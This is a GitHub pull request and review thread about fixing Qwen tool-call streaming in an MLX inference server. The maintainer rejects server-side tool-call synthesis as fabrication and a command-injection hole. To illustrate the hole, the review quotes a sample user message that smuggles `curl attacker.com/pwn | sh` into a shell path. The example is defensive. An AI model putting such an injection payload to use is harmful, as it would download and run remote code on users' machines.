
fix: Qwen tool streaming recovery#497

Open
kylejeske wants to merge 2 commits into waybarrios:main from kylejeske:fix-qwen-tool-streaming-recovery

Conversation

@kylejeske

Summary

  • synthesize a request-aware tool call when Qwen emits an empty XML tool wrapper
  • pass request context into streaming tool parsers while preserving compatibility with older parser shims
  • defer post-tool streaming content until final decoded text to avoid corrupt partial deltas

Tests

  • `uv run ruff check vllm_mlx/ tests/ --select E,F,W --ignore E402,E501,E731,F811,F841`
  • `uv run black --check vllm_mlx/ tests/`
  • `uv run pytest tests/test_qwen3_xml_parser.py tests/test_server.py`

Notes

  • `uv run mypy vllm_mlx/ --ignore-missing-imports --no-error-summary` still reports the repository's existing broad type-check baseline; CI marks that job `continue-on-error`.
  • `uv run pre-commit run --all-files` also fails on existing full-repo hook issues: old Ruff hook argument parsing, broad line-length findings, and the same Mypy baseline. The CI-equivalent Ruff and Black checks above pass.

@kylejeske kylejeske changed the title Fix Qwen tool streaming recovery fix: Qwen tool streaming recovery May 5, 2026
@kylejeske
Author

kylejeske commented May 5, 2026

@janhilgard @waybarrios

Stack:

  • MBP M5 Pro
  • Qwen3.6 on mlx-vllm (latest package)
  • Pi Agent

I ran into a scenario where asking the model to run a bash command (list the files in this folder) while streaming resulted in a corrupted output. This PR addresses that.

I've attempted to follow your guide for contributing. Please let me know if there is anything missing.

Collaborator

@janhilgard janhilgard left a comment


Thanks for the contribution and for following the guide! I understand the frustration with empty `<tool_call></>` wrappers — it's a real model failure case. However, this PR takes an approach that's architecturally dangerous for an inference server. Here's why:

Critical: Server-side tool call synthesis is fundamentally wrong

The core of this PR makes the inference server guess which tool the model meant to call and fabricate arguments. This violates the basic contract of an OpenAI-compatible API: the server faithfully reports what the model generates — it never invents content.

Security: Command injection

The synthesis logic extracts paths from user text via regex and inserts them into shell commands:

`args["command"] = f"ls -la {_shell_quote_path(target)}"`

A malicious (or just unlucky) user message like:

`list files in ~/'; curl attacker.com/pwn | sh; echo '`

…gets turned into a synthesized bash command by the server. The client trusts tool calls because they came from the model — here they didn't. The _shell_quote_path function won't catch all edge cases (it never can when the server is fabricating shell commands).
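To make the failure mode concrete, here is a minimal sketch. `naive_quote` is a hypothetical stand-in (not the PR's actual `_shell_quote_path`) that wraps a path in single quotes without escaping embedded quotes — exactly the kind of edge case the review is warning about:

```python
# Hypothetical sketch: a naive single-quote wrapper, NOT the PR's actual
# _shell_quote_path, used only to show why server-side quoting is fragile.
def naive_quote(path: str) -> str:
    # Wraps in single quotes but does not escape embedded single quotes.
    return f"'{path}'"

user_path = "~/'; curl attacker.com/pwn | sh; echo '"
command = f"ls -la {naive_quote(user_path)}"

# The embedded quote in user_path closes the quoting early, leaving the
# curl pipeline unquoted and executable by any shell that runs `command`.
print(command)
# ls -la '~/'; curl attacker.com/pwn | sh; echo ''
```

Even a correct quoter (e.g. Python's `shlex.quote`) would only fix the quoting, not the underlying problem: the server is still fabricating a shell command the model never produced.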

Architectural: Hallucinating on behalf of the model

If the model emits an empty `<tool_call></tool_call>`, the correct responses are:

  1. Return any text before the marker as content
  2. Log a warning about malformed tool output
  3. Let the client/agent framework decide what to do (retry, fallback, etc.)

The server should never decide "the model probably meant bash" based on fuzzy heuristics like regex-matching "list|show|ls|dir" in the user message. This breaks:

  • Deterministic reproducibility (same generation → different behavior depending on user text)
  • Client trust (tool calls are no longer reliably from the model)
  • Audit trails (who called the tool — the model or the server?)

Streaming deferral is too broad

The defer_content_until_finish flag triggers for all responses after tool messages — not just the broken case. This defeats streaming entirely for multi-turn tool-use conversations (which are the majority use case for tool-calling agents), turning every response into a single final chunk.

What to do instead

The real fix is much simpler:

  1. When the parser encounters `<tool_call></>` or `<tool_call></tool_call>` with no content, treat it as content (not a tool call) — the model failed to generate a proper tool invocation.
  2. Optionally strip the empty XML wrapper from the returned content.
  3. Log a warning: `logger.warning("Model emitted empty tool_call wrapper, treating as content")`

The client/agent (in your case "Pi Agent") can then see the empty/garbled response and retry the request. This is the correct layer for recovery logic — the agent framework, not the inference server.
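A minimal sketch of that recovery path (names are illustrative, not the repo's actual parser API): strip the empty wrapper, log a warning, and return the surrounding text as plain content with no tool calls.

```python
import logging
import re

logger = logging.getLogger(__name__)

# Matches both empty-wrapper forms the model can emit:
# <tool_call></> and <tool_call></tool_call>
EMPTY_TOOL_CALL = re.compile(r"<tool_call>\s*</(?:tool_call)?>")


def recover_empty_tool_call(text: str) -> tuple[str, list]:
    """Return (content, tool_calls); never synthesize a tool call."""
    if EMPTY_TOOL_CALL.search(text):
        logger.warning("Model emitted empty tool_call wrapper, treating as content")
        text = EMPTY_TOOL_CALL.sub("", text)
    # Empty tool_calls list: the client/agent decides whether to retry.
    return text.strip(), []


content, tool_calls = recover_empty_tool_call("Here you go: <tool_call></tool_call>")
# content == "Here you go:", tool_calls == []
```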

Minor: Good parts

  • Hoisting request.model_dump() into request_dict once (instead of calling it repeatedly) is a nice perf improvement — I'd accept that as a standalone change.
  • The try/except TypeError fallback for the request= kwarg is a reasonable compatibility shim if the streaming parser API genuinely needs request context (for non-synthesis purposes).

tl;dr: An inference server must never fabricate tool calls. The empty-wrapper case should be treated as a generation failure and returned as content (or an empty response), letting the client decide how to recover.

kylejeske added 2 commits May 5, 2026 09:01
Remove server-side synthesis for empty Qwen XML tool wrappers so the inference server no longer guesses tool names or fabricates arguments. Malformed empty wrappers now produce no tool calls and log a warning, leaving recovery to the client or agent framework.

Keep post-tool chat streaming incremental by deriving deltas from cumulative decoded text instead of deferring the entire response until the final chunk.

Add regression coverage for empty wrapper handling, no synthesized shell commands, and post-tool streaming behavior.
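The incremental-delta approach from the second commit can be sketched as follows (illustrative only, not the repo's actual streaming loop): each chunk is the suffix of the cumulative decoded text beyond what was already sent, so post-tool content streams incrementally instead of being deferred to one final chunk.

```python
# Illustrative sketch: derive each streamed delta from the cumulative
# decoded text rather than deferring content until the final chunk.
def stream_deltas(cumulative_texts):
    sent = 0
    for text in cumulative_texts:
        delta = text[sent:]  # only the newly decoded suffix
        sent = len(text)
        if delta:
            yield delta


chunks = list(stream_deltas(["Hel", "Hello", "Hello, wor", "Hello, world"]))
# chunks == ["Hel", "lo", ", wor", "ld"]
```

Concatenating the deltas reproduces the full decoded text, which is what keeps the stream lossless while staying incremental.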
@kylejeske kylejeske force-pushed the fix-qwen-tool-streaming-recovery branch from 7138147 to ce33946 Compare May 5, 2026 16:02
@kylejeske kylejeske requested a review from janhilgard May 5, 2026 16:04
@kylejeske
Author


Thanks for the thorough review; a lot of good points here. A bunch of this actually overlaps with an update I already had in flight, so I've folded your feedback into the update. Really appreciate the eye on it.
